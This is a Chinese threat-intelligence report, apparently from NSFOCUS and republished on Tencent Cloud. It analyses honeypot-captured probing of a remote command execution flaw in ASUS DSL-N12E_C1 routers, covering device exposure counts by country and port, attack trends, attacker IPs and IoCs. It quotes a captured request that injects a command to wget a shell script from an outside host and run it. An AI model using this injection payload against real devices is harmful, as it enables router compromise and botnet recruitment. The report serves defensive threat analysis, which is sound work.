前往小程序,Get更优阅读体验!
立即前往
首页
学习
活动
专区
工具
TVP
发布
社区首页 >专栏 >【格物猎踪】“磨刀霍霍”—ASUS DSL-N12E_C1 RCE漏洞正被探测

【格物猎踪】“磨刀霍霍”—ASUS DSL-N12E_C1 RCE漏洞正被探测

作者头像
绿盟科技研究通讯
发布2020-08-10 13:38:43
6400
发布2020-08-10 13:38:43
举报
文章被收录于专栏:绿盟科技研究通讯

执行摘要

近期,我们在排查绿盟威胁捕获系统相关日志的过程中发现,自2020年2月27日起,针对ASUS DSL-N12E_C1 RCE漏洞[1]出现了探测、利用行为。本文将通过脆弱性、暴露情况以及威胁分析三个方面,分析本次捕获到的攻击。

脆弱性分析一节,我们结合互联网公开PoC及捕获到的攻击,分析了攻击手法。

暴露情况分析一节,我们发现2020年1月至2020年7月,互联网中暴露了33000台ASUS DSL-N12E_C1,大部分分布在巴西、澳大利亚和意大利。

威胁分析一节,我们分析了攻击次数和攻击源的分布,发现攻击次数和攻击源数量均没有出现爆发的情况,我们推测针对该漏洞的探测和利用还处于编写、测试EXP模块的阶段。

截至成稿,我们尚未发现针对该漏洞的利用有爆发的迹象,但也应引起各方注意,提前做好预防措施。

一、脆弱性分析

本次我们捕获到的攻击针对ASUS DSL-N12E_C1,漏洞细节参见EDB-ID:48315[1]。该漏洞存在于DSL-N12E_C1的Web服务中,触发RCE的PATH_INFO为:/Main_Analysis_Content.asp。通过向QUERY_STRING中的特定位置插入命令,仅需发送一条GET请求即可触发漏洞。

绿盟科技威胁捕获系统中,捕获到的恶意载荷如下所示:

POST

/Main_Analysis_Content.aspcurrent_page=Main_Analysis_Content.asp&next_page=Main_Analysis_Content.asp&next_host=group_id=&modified=0&action_mode=+Refresh+&action_script=&action_wait=&first_time=&applyFlag=1&preferred_lang=EN&firmver=1.1.2.3_345-g987b580&cmdMethod=ping&destIP=wget%192.236.163.208/Sep.sh%20;%20sh%20Sep.sh

可以看出,攻击者尝试自行拼接构成一个能够触发该RCE的HTTP请求,但截至截稿,其拼接的恶意载荷均不是完整的HTTP请求,我们认为其实际上无效,但不排除日后攻击者更新的可能。另外,其尝试触发漏洞的请求方式与ExploitDB公布的略有不同,ExploitDB中触发该漏洞的方法为GET,而攻击者请求的方法为POST。

二、 暴露情况分析

通过使用绿盟威胁情报中心对DSL-N12E_C1指纹进行搜索,共发现33000条记录(2020年1月至2020年7月),端口暴露情况分布如图 2.1 所示,从端口分布可以看出RTSP服务默认的554端口暴露最多,其余是常见WEB服务的端口,如7547,8080,80都是HTTP(s)的常用端口。另外,SIP、Telnet、SSH、FTP服务也存在一定的暴露。

图 2.1 暴露的ASUS DSL-N12E_C1开放端口(1000以上)情况(2020年1月至2020年7月)

暴露的ASUS DSL-N12E_C1国家分布(前十)情况如图 2.2 所示,可以看出巴西的暴露数量明显多于其他国家。另外,澳大利亚和意大利也存在超过3000台设备暴露。

图 2.2 暴露的ASUS DSL-N12E_C1国家分布(前十)情况(2020年1月至2020年7月)

三、威胁分析

3.1 攻击趋势

我们对2020年以来,该攻击的次数进行了统计,如图 3.1 所示。发现攻击最早出现在2020年2月27日,2020年3月-4月攻击相对活跃,2020年5月截至截稿,攻击相对平缓,且数量较少。攻击次数较少,说明并未针对该漏洞的利用,目前还处于编写、测试EXP模块的阶段,暂时没有出现爆发的情况,但也应引起注意,做好预防措施。

图 3.1 攻击次数变化趋势

最后,我们统计了攻击源数量变化,2020年1月至2020年7月,相同时间段攻击源数量始终在个位数之间波动,但攻击源的总数量超过了50个。结合较少的攻击次数,从侧面证明了我们的推测,攻击者目前使用了固定的主机测试该漏洞,尚未发动僵尸主机参与扫描。而攻击源总数超过20个则说明,针对该漏洞的攻击源交替活跃,并未出现在同一时段爆发的情况。截至2020年7月,虽然我们暂未发现针对本文所述漏洞的利用出现爆发的迹象,但不排除日后僵尸网络将本文所述漏洞加入武器库的可能性。

3.2典型攻击源分析

我们对捕获到的攻击源进行了分析,发现大部分攻击源还在不同程度地利用其他漏洞,攻击物联网设备。其中部分IP需要引起注意:

193.106.162.134,位于俄罗斯,该攻击源最早于2020年2月1日被我们捕获,出现漏洞探测行为,除对本文所述漏洞进行探测外,还探测了以下漏洞:

- CVE-2017-17215,漏洞利用详情参见EDB-ID:43414[[2]。

- MVPower DVR TV-7104HE 1.8.4 115215B9-Shell命令执行,漏洞利用详情参见EDB-ID:41471[3]。

93.71.247.71,位于意大利,该攻击源最早于2020年2月1日被我们捕获,出现漏洞探测行为,除对本文所述漏洞进行探测外,还探测了以下漏洞:

- CVE-2014-8361,漏洞利用详情参见EDB-ID:37169[4]。

- CVE-2017-17215,漏洞利用详情参见EDB-ID:43414。

- MVPower DVR TV-7104HE 1.8.4 115215B9-Shell命令执行,漏洞利用详情参见EDB-ID:41471。

3.3IoC

部分样本源文件名与SHA256

文件名

sha256

richard

27495c6334048dd8f30a8334e141af6937ea08c83138aeaec3df2ce42edd64d9

URLS

http://80.82.67.184/richard

192.236.163.208/Sep.sh

参考文献

[1] Exploit DB.ASUS DSL-N12E_C1 1.1.2.3_345 - Remote Command Execution. https://www.exploit-db.com/exploits/45135.

[2] ExploitDB. Huawei Router HG532 - Arbitrary Command Execution. https://www.exploit-db.com/exploits/43414.

[3] Exploit DB. MVPower DVR TV-7104HE 1.8.4115215B9 - Shell Command Execution (Metasploit). https://www.exploit-db.com/exploits/41471. https://www.exploit-db.com/exploits/41471.

[4] Exploit DB. Realtek SDK - Miniigd UPnP SOAPCommand Execution (Metasploit). https://www.exploit-db.com/exploits/37169

本文参与 腾讯云自媒体同步曝光计划,分享自微信公众号。
原始发表:2020-08-05,如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 绿盟科技研究通讯 微信公众号,前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体同步曝光计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
相关产品与服务
高级威胁追溯系统
腾讯高级威胁追溯系统(Advanced Threat Tracking System,ATTS)由腾讯安全团队构建的高级威胁追溯平台,旨在帮助用户通过该平台进行线索研判,攻击定性和关联分析,追溯威胁源头,有效预测威胁的发生并及时预警。
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档